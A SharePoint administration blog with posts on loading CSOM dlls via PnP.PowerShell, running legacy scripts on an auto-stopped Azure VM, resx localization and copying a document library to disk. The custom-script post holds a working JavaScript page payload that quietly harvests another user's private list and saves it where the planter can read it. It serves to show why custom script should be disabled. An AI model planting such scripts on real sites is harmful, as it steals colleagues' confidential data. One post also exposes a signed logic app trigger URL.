CHUVASH.eu

CHunky Universe of Vigourous Astonishing SHarepoint :)


Smarter way of loading SharePoint CSOM dll in PowerShell

Have you also got a legacy PowerShell script that loads SharePoint dlls and runs CSOM code directly? It’s quite easy to convert it to PnP PowerShell, but if you are out of time and just need to execute the script, I have a quick tip for you.

First of all, a CSOM script can be recognized by Add-Type commands (or Import-Module) plus the SharePoint dll paths.

Loading the dll the old way.
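In case the screenshot is hard to read, the old way typically looks something like this (a sketch; the path below is the usual SDK/server location, the so called 16 hive, and may differ in your environment):

# The classic way: load the CSOM dlls from the SharePoint "hive" on disk
# (15 for SharePoint 2013, 16 for SharePoint 2016/2019 and the Online SDK)
Add-Type -Path "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\ISAPI\Microsoft.SharePoint.Client.dll"
Add-Type -Path "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\ISAPI\Microsoft.SharePoint.Client.Runtime.dll"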

The odds are high that you don’t have those directories and files, unless you run it on a SharePoint Server (who would do that at all?) or you have installed the SharePoint SDK.

The SharePoint SDK can be downloaded and installed (as suggested here), but why would you want to do that? An easier way is to locate the files that are distributed with the PnP.PowerShell module. Let me show how to do that.

All the dlls are available from the PnP.PowerShell module directory:

So the only thing you need to do is to re-point the path from the original (the “GAC”) folder to the PnP.PowerShell folder. You don’t need to guess the folder. It’s easy.

Thanks to the PowerTip: Find the Path to a PowerShell Module (Scripting Guy) I found a way to read that information dynamically, so it doesn’t matter where your folder actually is. The module version, the OS you run on, and whether you installed the module for your user account only or for all users on the computer – all of that affects the folder location. So we need to read the right path and then use it in the Add-Type command.

$pnpModule = Get-Module -ListAvailable PnP.PowerShell
$base = $pnpModule.ModuleBase
Connect-PnPOnline -Url $url -Interactive
Add-Type -Path "$base\Framework\Microsoft.SharePoint.Client.dll"
Add-Type -Path "$base\Framework\Microsoft.SharePoint.Client.Runtime.dll"

Other notes

PnP.PowerShell is built on top of .NET Core and works cross-platform, which is better.

Loading dlls on a Mac.
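On a Mac the trick is the same, roughly like this (a sketch, assuming the Core flavor of the assemblies is the right one for PowerShell 7; use Join-Path instead of backslashes):

# Locate the module and load the cross-platform (Core) assemblies
$pnpModule = Get-Module -ListAvailable PnP.PowerShell
$base = $pnpModule.ModuleBase
Add-Type -Path (Join-Path $base "Core/Microsoft.SharePoint.Client.dll")
Add-Type -Path (Join-Path $base "Core/Microsoft.SharePoint.Client.Runtime.dll")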

If your legacy script does not work with the newer PnP.PowerShell, you might need to install the older PnP PowerShell and adjust the module name in the script above accordingly.

The SharePoint SDK is built on top of .NET Framework (as far as I understand) and can only be installed on a Windows machine.

The SharePoint SDK requires local administrator rights to install. PnP.PowerShell can be installed without being an administrator by adding -Scope CurrentUser to Install-Module, which makes the work much smoother.

If you have two or more versions of the PnP.PowerShell module installed, you have to adjust the script a little by loading only the latest version of the module:

$pnpModule = Get-Module PnP.PowerShell -ListAvailable | Sort-Object Version -Descending | Select-Object -First 1
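After that, $pnpModule.ModuleBase points to the newest version’s folder, and the Add-Type lines above work unchanged.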

That was a quick tip on how you can use the types from the original CSOM libraries when you don’t have time to convert a script to PnP code, or when some functionality is not covered by PnP yet (though I am not sure there is anything you can do with CSOM that you cannot do with PnP).

The good sides of that approach:

  • it can be a step towards rewriting a legacy script to a newer PnP.PowerShell
  • the dlls are up-to-date thanks to an easy way to update the PowerShell Module (Update-Module)
  • it is cross platform, meaning you can execute your legacy script on Linux or on a Mac as well, good for automation!

A cost-effective way of running legacy scripts in the cloud

Have you also got some old, huge scripts that run on a local server? Have you considered moving them to the cloud? Here is an idea for how to do it quickly and easily.

In my case I have some older PowerShell scripts that are harder to convert to serverless applications:

  • They use the MSOnline PowerShell module, so they would need rewriting to AzureAD before running in an Azure Function
  • They take around 15 minutes to complete, while the Azure Functions Consumption Plan is limited to 10 minutes. Of course I could split them into several parts, but I am looking for an easy way right now; I have to postpone refactoring because I am not sure there is a real need for this script solution yet.
  • They process a lot of data and consume more than 400 MB of memory, which makes them crash when I put them in an Azure Automation runbook.

Well, maybe a Windows Server VM in Azure is the only way? While recently setting up a Minecraft server, following a blog post that proposes auto-shutdown and logic apps to start the server, I came up with the idea of using exactly the same approach to make this as cost effective as possible.

The script solution I’ve got needs 15 minutes to complete and runs every night. For the remaining 23 hours and 45 minutes a day, the VM is not needed at all, so I can stop it. Here is what I’ve tried and got working:

  1. A logic app that starts once a day
  2. It turns on the Windows Server VM
  3. A PowerShell script runs as a scheduled job registered to run at startup
  4. Once done, the script makes an HTTP call to the Stop logic app
  5. The logic app stops and deallocates the Windows server VM

Job at startup (3)

PowerShell has a native way to register jobs that run at startup. I just followed this digestible guide:

I created a new folder: C:\Scripts

I copied my legacy script to that folder, let’s call it ‘Legacy.ps1’ for the sake of simplicity, then I created a startup job by running these two lines:

$trigger = New-JobTrigger -AtStartup -RandomDelay 00:00:30
Register-ScheduledJob -Trigger $trigger -FilePath C:\Scripts\Legacy.ps1 -Name Legacy
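If you want to verify that the job and its trigger really got registered, the standard PSScheduledJob cmdlets can show it:

# List the scheduled job and its startup trigger
Get-ScheduledJob -Name Legacy
Get-JobTrigger -Name Legacy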

The Windows Server VM (2)

I created a Windows Server 2019 Datacenter Server Core VM to make it as lightweight as possible. I put it in a separate resource group and didn’t reserve any IP addresses or DNS names. I even disabled all ports, including RDP, for the highest security.

Other specs:

  • CPU: 1vCPU
  • Size: Standard B1ms
  • RAM: 2GB
  • HDD: HDD (no redundancy)
My choice of the VM image.

The start logic app (1, 2)

In the same resource group I created a logic app that turns on the VM daily at 00:13 UTC.

Easy, isn’t it?

Once started, the VM triggers the scheduled job – the Legacy.ps1 script.

At the end of the script there is an HTTP call to my ‘Stop’ logic app:

Invoke-WebRequest -Uri "https://prod-32.westeurope.logic.azure.com:443/workflows/daf4a94e9d334032848f23b2651da35d/triggers/manual/paths/invoke?api-version=2016-10-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=45c3PJfdneqSgwU8lhrbvD09YKd0s_L55FlxvON4Bajs"

The stop logic app (4, 5)

Obviously, the trigger I use in my next logic app is an HTTP request.

Whenever it is triggered, it stops and deallocates the VM.
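Under the hood, this is the same operation as the following Az PowerShell call (a minimal sketch; the resource group and VM names are placeholders):

# Stop AND deallocate the VM, so its compute is no longer billed
Stop-AzVM -ResourceGroupName "LegacyRG" -Name "LegacyVM" -Force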

What does it cost?

I’ll save this discussion for later. It costs more than serverless applications, for sure, but less than a VM that is on and idling for hours every day. What I propose is a workaround for running huge legacy Windows scripts in Azure when you don’t have time to refactor them.

The cost of the last three days.

Is Custom Script Dangerous?

Allowing custom script has its security implications. But what exactly does that mean? Is it dangerous? My colleague Daniel and I did a little experiment. There are two implications stated on MS Docs:

  • Scripts have access to everything the user has access to.
  • Scripts can access content across several Office 365 services and even beyond with Microsoft Graph integration.

To summarize, we can look at this picture:

So the risk is that user 1 (the Blue User) intentionally or unintentionally places a script, and lets user 2 (the Red User) run this script by linking to the page that contains it. The page must be in a “common” place.

Let’s try that. Let’s have a little hackathon.

Experiment A. Very Simple.

Scenario: the Red User (my colleague Daniel) has a site with sensitive information (he has a list called Secrets). The Blue User (me) does not have access to that site. The Red User accidentally shares the link to the secret list. Now, to prove the security risks of custom script, the Blue User has to get the secret information.

To make it more visual and fun, we have found a box where we have put candies and locked it with a combination lock. The code (the combination) is stored in the Secrets list.

The combination consists of three digits from 0 to 9. So there are 1000 possible combinations.

Since the Red User knows that he is going to be hacked, he acts as normally as possible, not especially suspicious. And since Experiment A is a simple one, we let the Red User accidentally reveal the link to the Secrets list. That can be:

  • A screenshot that shows something else but contains the confidential site url
  • An email that is sent to a wrong recipient
  • A pasted link in a wrong Teams chat
  • etc.

So the Blue User finds out that there is a Secrets list that has the following address:

/sites/DailyWork/Lists/Secrets

“Fortunately”, the Blue User has access to a classic site (where Custom Script is allowed). He shares that site with the Red User. Now both the Blue User and the Red User have it in common.

Then, a new Web Part Page is added with a tiny script.

try {
    // Read all items from the Secrets list on the Red User's site
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "/sites/DailyWork/_api/web/Lists/GetByTitle('Secrets')/Items", true);
    xhr.setRequestHeader("Accept", "application/json;odata=nometadata");
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            var content = xhr.responseText;
            // Upload the harvested items as a .json file to the common site's document library
            var time = new Date().getTime();
            var url = _spPageContextInfo.webServerRelativeUrl
                + "/_api/web/getfolderbyserverrelativeurl('Shared Documents')/Files/add(overwrite=true, url='"
                + time + ".json')";
            var xhrUpload = new XMLHttpRequest();
            xhrUpload.open("POST", url, true);
            xhrUpload.setRequestHeader("Content-Type", "text/plain");
            xhrUpload.setRequestHeader("X-RequestDigest", __REQUESTDIGEST.value);
            xhrUpload.send(content);
        }
    };
    xhr.send(null);
}
catch (e) { /* do nothing, fail silently */ }

That script makes a REST call to the Secrets list and uploads the result to Shared Documents. For the sake of simplicity, a built-in document library is used; an attacker would probably add a hidden list for that.

Now, to get the Red User to that page, the Blue User adds some “important” information so that the Red User does not become suspicious.

The “important” information and the actual script editor

Now it is just a matter of sending the link to the Red User. The Red User navigates to the page, and the script executes while he is reading the information on it.

The Blue User gets the Secret that was generated by the Red User:

With that information the Blue User has hacked the combination lock and he can now open the red box with candies!

Skitgott Candy

Experiment B. Harder

For now, I think Experiment A, the simple one, is enough. We have proved that security is indeed compromised when custom script is allowed: a user can get confidential information from another user. Maybe some of you want to set up a more sophisticated experiment; make sure the “hacked” person is warned and agrees to take part in an ethical hacking act. We could try more experiments to show the importance of keeping custom script disabled and not using classic sites, which have it enabled by default.

Wrapping up

Custom Script (or DenyAddAndCustomizePages=false) is dangerous, but it is of course not black and white. It provides the ability to have small applications directly on sites created by users. But as with all other aspects of IT, you should know what you are doing. Every site with custom script is a potential trojan horse. Minimizing the number of classic sites and sites with custom script lowers the risk. All collaboration sites should be modern team sites without custom script.
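For reference, this is roughly how a tenant admin turns custom script off on a site using the SharePoint Online Management Shell (a sketch; the tenant and site URLs are placeholders):

# Deny custom script on the site (sets DenyAddAndCustomizePages to true)
Connect-SPOService -Url "https://contoso-admin.sharepoint.com"
Set-SPOSite -Identity "https://contoso.sharepoint.com/sites/classicteam" -DenyAddAndCustomizePages $true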

JavaScript Localization in SharePoint

Yesterday Waldek Mastykarz published a cool post: Globalizing JavaScript in SharePoint 2013. It is a very cool technique for localizing your client code in JavaScript and reusing your resx files on the server side and the client side. It is actually not new to SharePoint 2013, although it has become more needed with the huge client focus in the new SharePoint. I used it in SharePoint 2010 for a long time and described it in my blog post ScriptResx.ashx in SharePoint. What I didn’t know was that you can define your JavaScript namespace directly in the resx file. Waldek wrote in his comment that SP.Publishing.Resources.en-US.resx automatically becomes SP.Publishing.Resources in JavaScript. That was not the case for my own localization files. A simple look at SP.Publishing.Resources.en-US.resx helped:


  <!-- 
    Whether this .resx could be read by scriptResx.ashx handler. Only a file
    marked with scriptResx:true could be returned to client.
  -->
  <resheader name="scriptResx">
    <value>true</value>
  </resheader>
  <!-- the full name of the JavaScript class.  -->
  <resheader name="classFullName">
    <value>SP.Publishing.Resources</value>
  </resheader>

This results in:

_EnsureJSNamespace('SP.Publishing');

So what we have to do for our custom resx file is to add classFullName resheader:

  <resheader name="classFullName">
    <value>Takana.Res</value>
  </resheader>
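After that, the resources can be requested through the handler, for example /_layouts/ScriptResx.ashx?culture=en-US&name=Takana.Res, and the strings become available in JavaScript under the Takana.Res namespace.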

PowerShell: Copy an entire document library from SharePoint 2007 to disk

A while ago I needed to copy all files from a document library on a SharePoint 2007 site to the hard drive. I didn’t need to copy files from SharePoint to SharePoint, so I couldn’t use the stsadm -o export command or Chris O’Brien’s nice SharePoint Content Deployment Wizard. I came across the SPIEFolder application, which should work with SharePoint 2007 and 2010. It has a site on CodePlex: spiefolder.codeplex.com, but neither the binary nor the source code can be downloaded from there. After some searching I found the binary in the author’s SkyDrive. The fact that the source code was not available seemed like a disadvantage, because I could not know what code was run. Nevertheless I tried it out, and it didn’t work:

spiefolder -o export -url "http://dev/Documents" -directory c:\tolle\Documents -recursive

I got the following error:

The Web application at http://dev/Documents could not be found. Verify that you have typed the URL correctly. If the URL should be serving existing content, the system administrator may need to add a new request URL mapping to the intended application.

So I wrote my own code to copy the documents. Writing a console application feels so yesterdayish, so it is written in PowerShell. Even though there are no PowerShell snap-ins for SharePoint 2007, you have access to the entire server object model; the only thing you have to do is load the SharePoint assembly:

[void][System.Reflection.Assembly]::LoadWithPartialName("Microsoft.SharePoint")

Then you can instantiate all SharePoint objects like in C#, but in a PowerShell way:

$site = new-Object Microsoft.SharePoint.SPSite("http://dev")
$web = $site.OpenWeb()

You can even download a module that emulates the cmdlets Get-SPWeb, Get-SPWebApplication and Get-SPFarm, written by Natalia Tsymbalenko (sharing-the-experience.blogspot.com), to get started or just to find some inspiration.

I have created a ps1 script which does only one thing: it copies an entire document library to disk. Much of the inspiration for the structure of the script comes from “Delete-SPListItems” (sharepointryan.com).

Here it is: Pull-Documents.ps1

<#
.Synopsis
    Use Pull-Documents to copy the entire document library to disk
.Description
    This script iterates recursively over all directories and files in a document library and writes binary data to the disk
    The structure is kept as in the Document library
    It is mainly written for SharePoint 2007, but it works even in SharePoint 2010
.Example
    Pull-Document -Url http://dev -Library "Shared Documents"
.Notes
    Name: Pull-Documents.ps1
    Author: Anatoly Mironov
    Last Edit: 2012-12-03
    Keywords: SPList, Documents, Files, SPDocumentLibrary
.Links
    https://sharepointkunskap.wordpress.com
    http://www.bool.se
.Inputs
    None
.Outputs
    None
#Requires -Version 1.0
#>
[CmdletBinding()]
Param(
[Parameter(Mandatory=$true)][System.String]$Url = $(Read-Host -prompt "Web Url"),
[Parameter(Mandatory=$true)][System.String]$Library = $(Read-Host -prompt "Document Library")
)
[void][System.Reflection.Assembly]::LoadWithPartialName("Microsoft.SharePoint")

$site = new-object microsoft.sharepoint.spsite($Url)
$web = $site.OpenWeb()
$site.Dispose()

$folder = $web.GetFolder($Library)
$folder # must output it otherwise "doesn't exist" in 2007

if(!$folder.Exists){
    Write-Error "The document library cannot be found"
    $web.Dispose()
    return
}

$directory = $pwd.Path

$rootDirectory = Join-Path $pwd $folder.Name

if (Test-Path $rootDirectory) {
    Write-Error "The folder $Library in the current directory already exists, please remove it"
    $web.Dispose()
    return
}

#progress variables
$global:counter = 0
$global:total = 0
#recursively count all files to pull
function count($folder) {
    if ($folder.Name -ne "Forms") {
        $global:total += $folder.Files.Count
        $folder.SubFolders | Foreach { count $_ }
    }
}
write "counting files, please wait..."
count $folder
write "files count $global:total"

function progress($path) {
    $global:counter++
    $percent = $global:counter / $global:total * 100
    write-progress -activity "Pulling documents from $Library" -status $path -PercentComplete $percent
}

#Write file to disk
function Save ($file, $directory) {
    $data = $file.OpenBinary()
    $path = Join-Path $directory $file.Name
    progress $path
    [System.IO.File]::WriteAllBytes($path, $data)
}

#Forms folder doesn't need to be copied
$formsDirectory = Join-Path $rootDirectory "Forms"

function Pull($folder, [string]$directory) {
    $directory = Join-Path $directory $folder.Name
    if ($directory -eq $formsDirectory) {
        return
    }
    mkdir $directory | out-null

    $folder.Files | Foreach { Save $_ $directory }

    $folder.Subfolders | Foreach { Pull $_ $directory }
}

Write "Copying files recursively"
Pull $folder $directory

$web.Dispose()

I have tested this script in SharePoint 2007 and 2010. It works. Let me know if you find this useful or have some suggestions.

Default values for parameters in PowerShell functions

I was reading an interesting post about deploy scripts in PowerShell and discovered that you can put a default value in a function’s parameter. So instead of

function hello($name) {
  Write-Host $name
}

you can run:

function hello($name = "Gregor") {
  Write-Host $name
}
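A quick check in the console (the argument "Anna" is just an example):

hello         # prints "Gregor" (the default)
hello "Anna"  # prints "Anna"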

Very handy.

PowerShell

PowerShell is a way to manipulate data and structure in the SharePoint portal. The same tasks can be done with console applications. The advantage of PowerShell is that you can create scripts that are flexible and can be run with different parameters. PowerShell strongly resembles shell scripting in Linux, which suits me, since I actually come from the bash world. Microsoft has clearly let itself be inspired by it :).


There is a book about PowerShell, written by Swedes, that sounds interesting.

You don’t need to reinvent the wheel either: there are ready-made scripts you can use directly, as long as you pass the right parameters. Here is one place where you can find scripts. There are many pages that explain how to write scripts.
